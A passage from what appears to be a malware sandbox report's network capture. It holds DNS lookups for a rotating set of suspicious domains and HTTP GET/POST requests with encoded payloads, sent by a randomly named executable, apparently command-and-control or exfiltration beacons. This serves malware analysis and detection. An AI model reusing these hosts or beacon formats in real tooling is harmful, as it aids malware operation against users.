                                                    Sep 24, 2024 17:17:34.716342926 CEST5075153192.168.2.81.1.1.1
                                                    Sep 24, 2024 17:17:34.758177996 CEST53507511.1.1.1192.168.2.8
                                                    Sep 24, 2024 17:17:48.332094908 CEST6340453192.168.2.81.1.1.1
                                                    Sep 24, 2024 17:17:48.620441914 CEST53634041.1.1.1192.168.2.8
                                                    Sep 24, 2024 17:18:01.946733952 CEST5178353192.168.2.81.1.1.1
                                                    Sep 24, 2024 17:18:01.968615055 CEST53517831.1.1.1192.168.2.8
                                                    Sep 24, 2024 17:18:15.118307114 CEST5836853192.168.2.81.1.1.1
                                                    Sep 24, 2024 17:18:15.207317114 CEST53583681.1.1.1192.168.2.8
                                                    Sep 24, 2024 17:18:28.805757999 CEST6476753192.168.2.81.1.1.1
                                                    Sep 24, 2024 17:18:28.825619936 CEST53647671.1.1.1192.168.2.8
                                                    Sep 24, 2024 17:18:42.109142065 CEST6356753192.168.2.81.1.1.1
                                                    Sep 24, 2024 17:18:42.197330952 CEST53635671.1.1.1192.168.2.8
                                                    Sep 24, 2024 17:18:55.805922031 CEST6235853192.168.2.81.1.1.1
                                                    Sep 24, 2024 17:18:55.819299936 CEST53623581.1.1.1192.168.2.8
                                                    Sep 24, 2024 17:19:08.978514910 CEST5010253192.168.2.81.1.1.1
                                                    Sep 24, 2024 17:19:08.998646021 CEST53501021.1.1.1192.168.2.8
                                                    Sep 24, 2024 17:19:17.086457014 CEST5902253192.168.2.81.1.1.1
                                                    Sep 24, 2024 17:19:17.403105021 CEST53590221.1.1.1192.168.2.8
                                                    Sep 24, 2024 17:19:30.930104971 CEST5123553192.168.2.81.1.1.1
                                                    Sep 24, 2024 17:19:31.397933960 CEST53512351.1.1.1192.168.2.8
                                                    Sep 24, 2024 17:19:45.570436954 CEST6495053192.168.2.81.1.1.1
                                                    Sep 24, 2024 17:19:45.599677086 CEST53649501.1.1.1192.168.2.8

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Sep 24, 2024 17:17:13.424220085 CEST192.168.2.81.1.1.10xb867Standard query (0)www.asstl.onlineA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:17:18.446490049 CEST192.168.2.81.1.1.10x4a84Standard query (0)www.cc101.proA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:17:34.716342926 CEST192.168.2.81.1.1.10xab58Standard query (0)www.popin.spaceA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:17:48.332094908 CEST192.168.2.81.1.1.10xd90aStandard query (0)www.suarahati20.xyzA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:01.946733952 CEST192.168.2.81.1.1.10x716fStandard query (0)www.dhkatp.vipA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:15.118307114 CEST192.168.2.81.1.1.10x4d55Standard query (0)www.eslameldaramlly.siteA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:28.805757999 CEST192.168.2.81.1.1.10x60fbStandard query (0)www.pofgof.proA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:42.109142065 CEST192.168.2.81.1.1.10x8ad2Standard query (0)www.donante-de-ovulos.bizA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:55.805922031 CEST192.168.2.81.1.1.10x7841Standard query (0)www.airtech365.netA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:08.978514910 CEST192.168.2.81.1.1.10xb492Standard query (0)www.bonusgame2024.onlineA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:17.086457014 CEST192.168.2.81.1.1.10xd2cbStandard query (0)www.longfilsalphonse.netA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:30.930104971 CEST192.168.2.81.1.1.10xb975Standard query (0)www.yu35n.topA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:45.570436954 CEST192.168.2.81.1.1.10x6f49Standard query (0)www.52ywq.vipA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Sep 24, 2024 17:17:13.433687925 CEST1.1.1.1192.168.2.80xb867Name error (3)www.asstl.onlinenonenoneA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:17:18.577145100 CEST1.1.1.1192.168.2.80x4a84No error (0)www.cc101.pro188.114.97.3A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:17:18.577145100 CEST1.1.1.1192.168.2.80x4a84No error (0)www.cc101.pro188.114.96.3A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:17:34.758177996 CEST1.1.1.1192.168.2.80xab58No error (0)www.popin.space94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 24, 2024 17:17:34.758177996 CEST1.1.1.1192.168.2.80xab58No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:17:48.620441914 CEST1.1.1.1192.168.2.80xd90aNo error (0)www.suarahati20.xyzsuarahati20.xyzCNAME (Canonical name)IN (0x0001)false
                                                    Sep 24, 2024 17:17:48.620441914 CEST1.1.1.1192.168.2.80xd90aNo error (0)suarahati20.xyz198.252.106.191A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:01.968615055 CEST1.1.1.1192.168.2.80x716fNo error (0)www.dhkatp.vipdhkatp.vipCNAME (Canonical name)IN (0x0001)false
                                                    Sep 24, 2024 17:18:01.968615055 CEST1.1.1.1192.168.2.80x716fNo error (0)dhkatp.vip3.33.130.190A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:01.968615055 CEST1.1.1.1192.168.2.80x716fNo error (0)dhkatp.vip15.197.148.33A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:15.207317114 CEST1.1.1.1192.168.2.80x4d55No error (0)www.eslameldaramlly.siteeslameldaramlly.siteCNAME (Canonical name)IN (0x0001)false
                                                    Sep 24, 2024 17:18:15.207317114 CEST1.1.1.1192.168.2.80x4d55No error (0)eslameldaramlly.site148.251.114.233A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:28.825619936 CEST1.1.1.1192.168.2.80x60fbNo error (0)www.pofgof.pro209.74.95.29A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:42.197330952 CEST1.1.1.1192.168.2.80x8ad2No error (0)www.donante-de-ovulos.biz199.59.243.227A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:55.819299936 CEST1.1.1.1192.168.2.80x7841No error (0)www.airtech365.netairtech365.netCNAME (Canonical name)IN (0x0001)false
                                                    Sep 24, 2024 17:18:55.819299936 CEST1.1.1.1192.168.2.80x7841No error (0)airtech365.net3.33.130.190A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:18:55.819299936 CEST1.1.1.1192.168.2.80x7841No error (0)airtech365.net15.197.148.33A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:08.998646021 CEST1.1.1.1192.168.2.80xb492Name error (3)www.bonusgame2024.onlinenonenoneA (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:17.403105021 CEST1.1.1.1192.168.2.80xd2cbNo error (0)www.longfilsalphonse.net52.223.13.41A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:31.397933960 CEST1.1.1.1192.168.2.80xb975No error (0)www.yu35n.topyu35n.topCNAME (Canonical name)IN (0x0001)false
                                                    Sep 24, 2024 17:19:31.397933960 CEST1.1.1.1192.168.2.80xb975No error (0)yu35n.top38.47.232.144A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:45.599677086 CEST1.1.1.1192.168.2.80x6f49No error (0)www.52ywq.vip2rqff6.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 24, 2024 17:19:45.599677086 CEST1.1.1.1192.168.2.80x6f49No error (0)2rqff6.zxy-cname.comxzwp.g.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 24, 2024 17:19:45.599677086 CEST1.1.1.1192.168.2.80x6f49No error (0)xzwp.g.zxy-cname.com52.187.42.58A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:45.599677086 CEST1.1.1.1192.168.2.80x6f49No error (0)xzwp.g.zxy-cname.com52.230.28.86A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:45.599677086 CEST1.1.1.1192.168.2.80x6f49No error (0)xzwp.g.zxy-cname.com52.187.43.40A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:45.599677086 CEST1.1.1.1192.168.2.80x6f49No error (0)xzwp.g.zxy-cname.com13.76.139.81A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:45.599677086 CEST1.1.1.1192.168.2.80x6f49No error (0)xzwp.g.zxy-cname.com13.76.137.44A (IP address)IN (0x0001)false
                                                    Sep 24, 2024 17:19:45.599677086 CEST1.1.1.1192.168.2.80x6f49No error (0)xzwp.g.zxy-cname.com52.187.43.73A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.cc101.pro
                                                    • www.popin.space
                                                    • www.suarahati20.xyz
                                                    • www.dhkatp.vip
                                                    • www.eslameldaramlly.site
                                                    • www.pofgof.pro
                                                    • www.donante-de-ovulos.biz
                                                    • www.airtech365.net
                                                    • www.longfilsalphonse.net
                                                    • www.yu35n.top

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.863689188.114.97.3806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:17:18.597160101 CEST456OUTGET /ttiz/?L4Ml=5F0OqyJMruXZK289rjd3t7SMD6PUxbvF7XqmY+a1kYOMou9z9S8lHT4vD/FoxHElV5ffXVI3IhvTCCTpyiSb8mZInZ+7lTNJSqYtQImnDDTI4Qo9BSGA+0x0XmeeIzyp/A==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.cc101.pro
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:19.548255920 CEST1236INHTTP/1.1 200 OK
                                                    Date: Tue, 24 Sep 2024 15:17:19 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Last-Modified: Wed, 18 Sep 2024 08:27:45 GMT
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtL47jKrWB9J9JhQUKpMzP6DA41YqUTPniIXhEhiF8A3XMB%2BuAHkFh8sKwtg6b5bKOm6NuJYxMNRXeHf1ni7%2Fo5Y10Vq8hrnZgRZZsRfxa53rVVOZIFPZ%2Bf61zhQBZEK"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8c83bd99b82dc345-EWR
                                                    Data Raw: 65 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e e6 ac a2 e8 bf 8e e5 85 89 e4 b8 b4 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 36 65 61 65 62 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 20 32 30 30 70 78 20 61 75 74 6f 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 20 30 20 32 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 35 70 78 20 31 35 70 78 20 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 [TRUNCATED]
                                                    Data Ascii: e6e<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0"><title></title></head><body style="background: #e6eaeb;"><div style="position: relative;margin: 200px auto 0;padding: 0 0 22px;border-radius: 15px 15px 5px 5px;background: #fff;box-shadow: 10px 20px 20px rgba(101, 102, 103, .75);width:95%;max-width: 400px;color: #fff;text-align: center;"><canvas id="canvas" width="200" height="200" style="display:block;position:absolute;top:-100px;left:0;right:0;margin:0 auto;background:#fff;border-radius:50%;"></canvas><div style="color: #242424;font
                                                    Sep 24, 2024 17:17:19.548284054 CEST224INData Raw: 2d 73 69 7a 65 3a 20 32 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 31 31 70 78 20 20 30 20 32 30 70 78 22 3e e9 80 9a e8 bf 87 e5 ae 89 e5 85 a8 e5 8a a0 e5 af 86 e6 a3 80 e6 b5 8b 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67
                                                    Data Ascii: -size: 28px;padding:111px 0 20px"></div><div style="margin: 25px 0 14px;color: #7b7b7b;font-size: 18px;">&#65;&#71;&#30452;&#33829;&#32;&#20449;&#35465;&#20445;&#35777;</div><a id="btn" href="javas
                                                    Sep 24, 2024 17:17:19.548289061 CEST1236INData Raw: 63 72 69 70 74 3a 76 6f 69 64 28 30 29 3b 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 35 36
                                                    Data Ascii: cript:void(0);" style="display: block;border-radius: 500px;background-color: #ff5656;height: 65px;line-height: 65px;width: 250px;color: #fff;font-size: 22px;text-decoration: none;letter-spacing: 2px;margin:20px auto;cursor:pointer;">
                                                    Sep 24, 2024 17:17:19.548466921 CEST1236INData Raw: 20 20 20 20 20 63 74 78 2e 73 74 72 6f 6b 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 73 74 72 6f 6b 65 53 74 79 6c 65 20 3d 20 22 23 30 30 61 32 66 66 20 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                    Data Ascii: ctx.stroke(); ctx.strokeStyle = "#00a2ff "; ctx.lineWidth = ras * 0.12; ctx.beginPath(); ctx.arc(0, 0, ras * 0.8, -Math.PI / 2, -Math.PI / 2 + index * Math.PI
                                                    Sep 24, 2024 17:17:19.548472881 CEST366INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 64 72 61 77 46 72 61 6d 65 2c 20 32 30 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                    Data Ascii: } setTimeout(drawFrame, 20) } else if (index != 100) { index = 100; drawFrame() } else { docume


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.863690199.59.243.227806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:17:34.838097095 CEST719OUTPOST /x7gz/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.popin.space
                                                    Origin: http://www.popin.space
                                                    Referer: http://www.popin.space/x7gz/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 66 30 37 42 65 51 2f 36 46 2f 34 79 74 79 50 63 32 30 6f 6c 39 4c 68 52 2f 58 30 30 66 46 6d 38 42 67 7a 36 56 57 61 7a 7a 69 2b 4a 6f 63 41 59 4e 76 79 73 77 4e 4e 67 74 34 67 77 44 79 52 5a 4c 6c 76 67 37 33 70 35 38 6b 6a 75 63 68 57 6a 63 49 35 58 61 41 72 55 44 59 77 74 42 58 31 6d 45 63 42 78 4e 53 59 6c 33 79 36 66 68 4a 68 63 78 6e 7a 66 5a 72 62 31 6f 5a 44 30 51 50 50 62 48 4b 34 49 51 48 59 46 78 63 39 47 6d 32 71 44 6b 45 30 33 52 71 48 57 36 6e 4f 61 44 51 43 72 68 75 52 58 68 78 6b 74 44 54 67 77 48 77 39 6d 77 37 43 30 4b 34 6f 4d 4b 73 72 47 62 76 71 59 79 69 62 37 65 58 77 3d
                                                    Data Ascii: L4Ml=f07BeQ/6F/4ytyPc20ol9LhR/X00fFm8Bgz6VWazzi+JocAYNvyswNNgt4gwDyRZLlvg73p58kjuchWjcI5XaArUDYwtBX1mEcBxNSYl3y6fhJhcxnzfZrb1oZD0QPPbHK4IQHYFxc9Gm2qDkE03RqHW6nOaDQCrhuRXhxktDTgwHw9mw7C0K4oMKsrGbvqYyib7eXw=
                                                    Sep 24, 2024 17:17:35.277590990 CEST1236INHTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:17:34 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1110
                                                    x-request-id: bedfdf1a-fb3e-4a68-8848-6950764afc80
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                    set-cookie: parking_session=bedfdf1a-fb3e-4a68-8848-6950764afc80; expires=Tue, 24 Sep 2024 15:32:35 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6e 6b 45 65 79 57 74 59 38 67 67 59 56 72 30 4c 50 61 34 6f 77 74 32 67 61 61 38 55 36 32 69 76 62 7a 45 59 35 4f 31 4b 4d 39 63 32 2f 32 39 49 57 33 57 50 57 53 4f 42 36 42 49 76 36 4a 74 6d 6f 39 63 65 36 75 66 77 2b 46 50 62 67 2f 2f 74 48 6c 6d 48 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:17:35.277699947 CEST563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmVkZmRmMWEtZmIzZS00YTY4LTg4NDgtNjk1MDc2NGFmYzgwIiwicGFnZV90aW1lIjoxNzI3MTkxMD


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.863691199.59.243.227806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:17:37.558439970 CEST739OUTPOST /x7gz/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.popin.space
                                                    Origin: http://www.popin.space
                                                    Referer: http://www.popin.space/x7gz/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 66 30 37 42 65 51 2f 36 46 2f 34 79 73 54 2f 63 30 56 6f 6c 37 72 68 53 6a 48 30 30 56 6c 6d 34 42 6e 37 36 56 54 36 6a 7a 52 61 4a 72 34 49 59 4d 71 47 73 7a 4e 4e 67 2f 59 67 2f 4e 53 52 43 4c 6c 7a 65 37 31 39 35 38 67 4c 75 63 6a 65 6a 63 66 6c 55 61 51 72 53 49 34 77 76 4f 33 31 6d 45 63 42 78 4e 53 63 4c 33 7a 53 66 68 35 78 63 78 44 66 63 43 4c 62 32 74 70 44 30 64 76 50 66 48 4b 34 36 51 47 31 53 78 66 46 47 6d 33 61 44 6b 78 41 30 4b 36 48 51 33 48 4f 49 53 44 72 76 68 70 64 43 72 33 73 50 49 6c 34 32 4c 6d 51 4d 71 5a 4b 79 4a 34 41 6e 4b 76 44 77 65 59 33 77 6f 42 4c 4c 41 41 6e 53 42 53 66 35 6b 62 6d 30 6a 4c 4e 30 69 70 55 66 4b 59 58 4d
                                                    Data Ascii: L4Ml=f07BeQ/6F/4ysT/c0Vol7rhSjH00Vlm4Bn76VT6jzRaJr4IYMqGszNNg/Yg/NSRCLlze71958gLucjejcflUaQrSI4wvO31mEcBxNScL3zSfh5xcxDfcCLb2tpD0dvPfHK46QG1SxfFGm3aDkxA0K6HQ3HOISDrvhpdCr3sPIl42LmQMqZKyJ4AnKvDweY3woBLLAAnSBSf5kbm0jLN0ipUfKYXM
                                                    Sep 24, 2024 17:17:37.918539047 CEST1236INHTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:17:37 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1110
                                                    x-request-id: c427e70f-c2ec-49dd-bc3c-dfb8aad91d7c
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                    set-cookie: parking_session=c427e70f-c2ec-49dd-bc3c-dfb8aad91d7c; expires=Tue, 24 Sep 2024 15:32:37 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6e 6b 45 65 79 57 74 59 38 67 67 59 56 72 30 4c 50 61 34 6f 77 74 32 67 61 61 38 55 36 32 69 76 62 7a 45 59 35 4f 31 4b 4d 39 63 32 2f 32 39 49 57 33 57 50 57 53 4f 42 36 42 49 76 36 4a 74 6d 6f 39 63 65 36 75 66 77 2b 46 50 62 67 2f 2f 74 48 6c 6d 48 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:17:37.918557882 CEST563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzQyN2U3MGYtYzJlYy00OWRkLWJjM2MtZGZiOGFhZDkxZDdjIiwicGFnZV90aW1lIjoxNzI3MTkxMD


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.863692199.59.243.227806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:17:40.129610062 CEST1756OUTPOST /x7gz/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
